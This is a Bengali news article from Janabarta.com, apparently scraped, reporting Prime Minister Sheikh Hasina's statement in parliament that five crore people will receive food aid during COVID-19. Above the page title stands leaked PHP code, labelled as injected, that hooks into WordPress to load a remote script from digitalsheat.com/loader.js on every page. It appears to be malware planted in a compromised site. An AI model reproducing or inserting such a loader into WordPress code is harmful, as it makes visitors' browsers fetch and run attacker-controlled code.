// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ৫ কোটি লোক খাদ্য সহায়তার আওতায় আসবে: প্রধানমন্ত্রী - Janabarta.com

৫ কোটি লোক খাদ্য সহায়তার আওতায় আসবে: প্রধানমন্ত্রী

নিজস্ব প্রতিবেদক: দেশে করোনাভাইরাসের (কোভিড-১৯) কারণে সৃষ্ট পরিস্থিতি মোকাবেলায় সরকারের নেওয়া পদক্ষেপের মাধ্যমে পাঁচ কোটি মানুষ খাদ্য সহায়তা পাবেন বলে জানিয়েছেন প্রধানমন্ত্রী শেখ হাসিনা। শনিবার জাতীয় সংসদের সংক্ষিপ্ত অধিবেশনের সমাপনী বক্তব্যে তিনি এ কথা জানান।

প্রধানমন্ত্রী বলেন, করোনাভাইরাসের কারণে সৃষ্ট পরিস্থিতিতে দেশে যাতে কোনো প্রকার খাদ্য সংকট না দেখা দেয়, সে লক্ষ্যে কাজ করে যাচ্ছে সরকার। খাদ্যের ঘাটতি পূরণে দেশের এক কোটি মানুষকে রেশন কার্ড দেওয়া হবে। ইতোমধ্যে ৫০ লাখ মানুষকে কার্ড দেওয়ার কার্যক্রম চলছে।

তিনি আরো বলেন, এই কার্যক্রম বাস্তবায়ন হলে দেশের এক কোটি মানুষ এবং তাদের পরিবারের সদস্যরা সরকারের খাদ্য সহায়তার আওতায় আসবেন। এই এক কোটি মানুষের পরিবারের সদস্য যদি গড়ে পাঁচ জন হয়, তাহলে মোট খাদ্য সহায়তা পাবেন পাঁচ কোটি মানুষ।

করোনাভাইরাস পরিস্থিতি মোকাবেলায় সরকারের বিভিন্ন পদক্ষেপ তুলে ধরে তিনি আরো বলেন, দেশের প্রতিটি জেলা-উপজেলায় সরকারি হাসপাতালগুলোতে ৬ হাজার ২০০টি আইসোলেশন ইউনিট খোলা হয়েছে। পরিস্থিতি মোকাবেলায় বিভিন্ন ধরনের উদ্যোগ গ্রহণ করা হয়েছে। দেশের প্রতিটি জনগণ যাতে জেলা হাসপাতালগুলোতে গিয়ে উন্নত চিকিৎসা সেবা পায় ভবিষ্যতে সেই ব্যবস্থা করা হবে।

বিকেল পাঁচটায় জাতীয় সংসদের স্পিকার ড. শিরীন শারমিন চৌধুরীর সভাপতিত্বে শুরু হয় চলমান সংসদের সপ্তম অধিবেশন। এক অধিবেশন শেষ হওয়ার ৬০ কার্যদিবসের মধ্যে পরবর্তী অধিবেশন বসার সাংবিধানিক বাধ্যবাধকতা আছে। তাই বাছাইকৃত সংসদ সদস্যদের নিয়ে শুরু হয় এ অধিবেশন। সংসদ সদস্যরা মাস্ক ও হ্যান্ড গ্লাবস পরাসহ সকল স্বাস্থবিধি মেনে অধিবেশনে অংশগ্রহণ করেন।